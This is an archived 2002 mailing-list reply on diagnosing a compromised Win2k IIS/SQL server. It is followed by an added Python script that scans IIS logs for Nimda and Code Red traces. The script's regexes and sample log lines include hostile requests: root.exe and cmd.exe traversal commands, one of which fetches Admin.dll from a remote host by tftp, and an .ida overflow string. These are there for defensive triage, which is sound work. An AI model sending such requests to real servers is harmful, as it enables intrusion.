Re: exploited win2k box, not quite sure how:

From: Scott Fendley (scottfat_private)
Date: Mon May 20 2002 - 11:47:50 PDT


    There are several things I would look at on this computer.
    
    Was there an admin password set on the computer?  There has been a long
    discussion on the Unisog mailing list about Univs getting hit by hackers
    walking right through the front door on 2k/XP machines.  If the admin
    password was easy or NULL, this would be my first guess.
    
    The second thing I would look for is to make sure that the IIS ftp server
    was not set to allow anonymous users a chance to write to the hard drive.
    We have had a slew of 0-day ftp servers show up with similar tagging
    methods.  The tagging file/directories are used by automated processes
    that are seeing if they can write a file to the computer before they try
    to push their Warez/Porn/Junk on your computer and announce it to their
    buddies to download.
    
    The third thing I would wonder is if you have a root.exe available under
    the inetpub directory for the web server.  If you have nimda droppings on
    your computer, chances are that you were exposed to Nimda and hackers are
    using the root.exe to execute arbitrary commands on your system.  This
    could come down through the IIS server, email, open file shares, and other
    possible attack vectors if it was just nimda.
    
    The last thing I would check: has the SA account on SQL Server had a
    password set?  Has it been patched?  There are intrusions that are occurring
    due to SQL statements that can be mangled in such a way that arbitrary
    commands can be executed.
    
    Have you looked through the logs of the IIS servers you are using to see
    what evidence may be still there?  Are you sure that you have patched all
    of the computer (IIS, SQL, Win2k past the SP2 patches)?  There is very
    limited information that you have mentioned in the below email, so I can
    only guess on likely possibilities from my experience on a Univ campus.
    Maybe the above possibilities can help you determine which of the attack
    methods might be possible.  Look through the IIS logs and see if there is
    anything in there that makes you suspect one of the above over the others.
    
    If you would like me to send you the references to each of the above from
    various mailing lists and web sites, I would be willing to sit down later
    tonight and look them up for you.
    
    Scott
    
    
    On Fri, 17 May 2002, John Jasen wrote:
    
    >
    > Got a weird one here.
    >
    > Win2k server, SP2
    > IIS 5.0
    > SQL server 7
    > ipswitch imail 6.x
    >
    > It's definitely been broken into. PC-cillin has picked up a few nimda
    > files, and there is a directory c:\tAGGEd with various subdirectories
    > under it, and an unopenable file C:\TaGGed By Ca$e.
    >
    > I'm working on getting a disk image up for perusal, but that might take a
    > few days.
    >
    > Anybody seen this yet? Searching securityfocus, McAfee, Google, and a few
    > other places has come up dry.
    >
    > --
    > -- John E. Jasen (jjasen1at_private)
    > -- User Error #2361: Please insert coffee and try again.
    >
    >
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    >
    
    
    
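The triage Scott describes (look for root.exe/cmd.exe hits and the Nimda/Code Red traversal requests in the IIS web log, and for anonymous FTP sessions that managed to create directories or upload files) can be scripted against the W3C extended logs IIS 5.0 writes. The following is an added example, not code from the thread or from either poster. The log lines are constructed samples; the field set on a real server depends on which fields were enabled in the IIS logging properties, and the FTP method names (`[n]USER`, `[n]created`, `[n]received`, `[n]sent`) are assumed to follow the IIS FTP W3C convention.

```python
"""Triage IIS 5.0 W3C web and FTP logs for the attack paths discussed above.

Added example. WEB_LOG and FTP_LOG below are constructed samples, not real
evidence from the compromised host.
"""
import re

# Request patterns from the Nimda / Code Red II era: root.exe or cmd.exe copies
# reachable under the web root, the Unicode / double-decode traversal used to
# reach cmd.exe, and the .ida overflow request (Code Red).
WEB_SIGNATURES = {
    "root_or_cmd_exe": re.compile(r"/(root|cmd)\.exe", re.I),
    "unicode_traversal": re.compile(r"%c0%af|%c1%9c|%255c|%2e%2e%2f|\.\./", re.I),
    "ida_overflow": re.compile(r"\.ida\b", re.I),
}

# Constructed sample web log (W3C extended format, six fields enabled).
WEB_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-05-16 00:00:00
#Fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status
03:12:44 10.9.8.7 GET /default.htm - 200
03:13:01 192.0.2.77 GET /scripts/root.exe /c+dir 200
03:13:02 192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
03:13:03 192.0.2.77 GET /_vti_bin/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.77+GET+Admin.dll 502
03:14:10 198.51.100.5 GET /default.ida XXXXXXXXXXXXXXXX%u9090%u6858 200
""".splitlines()

# Constructed sample FTP log. Assumed IIS FTP convention: cs-method is
# "[session]COMMAND", with "created" for MKD and "received" for STOR.
FTP_LOG = """\
#Fields: time c-ip cs-method cs-uri-stem sc-status
04:01:10 203.0.113.9 [1]USER anonymous 331
04:01:10 203.0.113.9 [1]PASS IEUser@ 230
04:01:12 203.0.113.9 [1]created tAGGEd 226
04:01:13 203.0.113.9 [1]received tAGGEd/TaGGed+By+Ca$e 226
04:02:00 10.9.8.8 [2]USER jjasen 331
04:02:00 10.9.8.8 [2]PASS - 230
04:02:05 10.9.8.8 [2]sent /pub/readme.txt 226
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per record, keyed by the most recent #Fields: header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log record appears before any #Fields: header")
        values = line.split()
        # IIS writes '-' for empty fields; pad short records the same way.
        yield dict(zip(fields, values + ["-"] * (len(fields) - len(values))))


def triage_web_log(lines):
    """Return {signature name: [(client ip, uri stem, status), ...]}."""
    hits = {name: [] for name in WEB_SIGNATURES}
    for rec in parse_w3c(lines):
        target = rec.get("cs-uri-stem", "-") + " " + rec.get("cs-uri-query", "-")
        for name, pattern in WEB_SIGNATURES.items():
            if pattern.search(target):
                hits[name].append((rec.get("c-ip"), rec.get("cs-uri-stem"), rec.get("sc-status")))
    return hits


def triage_ftp_log(lines):
    """Return [(client ip, method, path)] for writes made by anonymous logins."""
    anonymous_ips = set()
    writes = []
    for rec in parse_w3c(lines):
        method = rec.get("cs-method", "")
        stem = rec.get("cs-uri-stem", "")
        ip = rec.get("c-ip")
        if method.upper().endswith("USER") and stem.lower() == "anonymous":
            anonymous_ips.add(ip)
        elif method.lower().endswith(("created", "received")) and ip in anonymous_ips:
            writes.append((ip, method, stem))
    return writes


if __name__ == "__main__":
    for name, records in triage_web_log(WEB_LOG).items():
        print(f"{name}: {len(records)} hit(s)")
        for ip, stem, status in records:
            print(f"    {ip} {stem} -> {status}")
    print("anonymous FTP writes:")
    for ip, method, path in triage_ftp_log(FTP_LOG):
        print(f"    {ip} {method} {path}")
```

A 200 on a root.exe or cmd.exe request is the result to chase: it means the backdoor copy existed and answered, so the Nimda droppings were not just scanner noise. Anonymous sessions that log `created`/`received` entries show the FTP server let them write, which is the tagging behaviour the thread describes; the fix is the anonymous write permission on the FTP site, not the tagged directory itself.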



    This archive was generated by hypermail 2b30 : Mon May 20 2002 - 19:01:15 PDT